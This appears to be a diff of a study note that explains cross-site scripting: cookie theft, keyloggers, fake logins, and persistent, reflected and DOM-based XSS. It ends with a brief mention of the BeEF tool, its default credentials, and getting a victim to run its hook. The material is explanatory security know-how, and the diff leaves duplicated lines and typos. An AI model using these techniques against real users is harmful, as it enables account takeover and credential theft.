Cross-site-scripting, or XSS as it is sometimes abbreviated to, is an attack that let's the attacker execute javascript code in the browser of the victim.
###So, what's the worst that can happen?
##So, what's the worst that can happen?
The attacker is probably not that interestd in changing the color or font of the website the victim is visiting. Although s/he could do that. The worst that can happen is probablt the following:
1. Session-hijacking/Cookie theft
1. Complete control over the browser
The attacker can access plugins. Like password managers. The attacker can trick the user into allowing webcam or audio.
2. Session-hijacking/Cookie theft
This is when the attacker steals the cookie that is saved in the browser. Using this cookie the attacker can log in to the service as the victim, and thereby gain access to his/her account. If the victim is an admin that has extended privileges (uploading code, images, or whatever) this could lead to a compromise of the server itself.
2. Keylogger
3. Keylogger
The attacker can execute a keylogging-script that steals everything the user inputs in the website. This could be used to steal sensitive information, like passwords, credit cards information, chatlogs or whatever the user inputs.
3. Phishing
4. Phishing
The attacker can insert a fake login. Image that you visit a site, and from that site you are able to login using your facebook or google-account. The attacker could spoof that so that when you enter your credencials, they are then sent to the attacker.
@@ -19,7 +23,7 @@ The attacker can insert a fake login. Image that you visit a site, and from that
### Types of XSS
1. Persistent
This is when the malicious code originates from the websites database. That means the attacker has managed to insert malicious code into the databse. So every time the database server that data the script will me executed.
This is when the malicious code originates from the websites database. That means the attacker has managed to insert malicious code into the database. So every time the database serve that data the script will me executed. this is probably the most dangerous XSS, since it does not need to rely on social engineering.
2. Reflected
This is an attack where the script originates from the users request. This might seem a bit illogical, why would a user inject malicious code to himself? Well the code can
@@ -28,6 +32,20 @@ This is an attack where the script originates from the users request. This might
DOM-based attacks are when something is injected into javascript on the DOM. So, it does not go by the server. Because the code gets executed in the response.
Take a search-functionality for example. The users enters a search-parameter that gets sent to the server which might sanitize it or something. In the response the found search-items are sent, but not the search-query. But on the webpage the search query is exposed. "You searched for X" is shown. That is because it gets the search parameter from the url-parameter. By using `document.location.href` for example.
## Beef
Beef username/password: beef:beef
Beef is a great tool for attacking browsers.
After starting it up you can log in to the panel. Then you get someone to execute the hook.
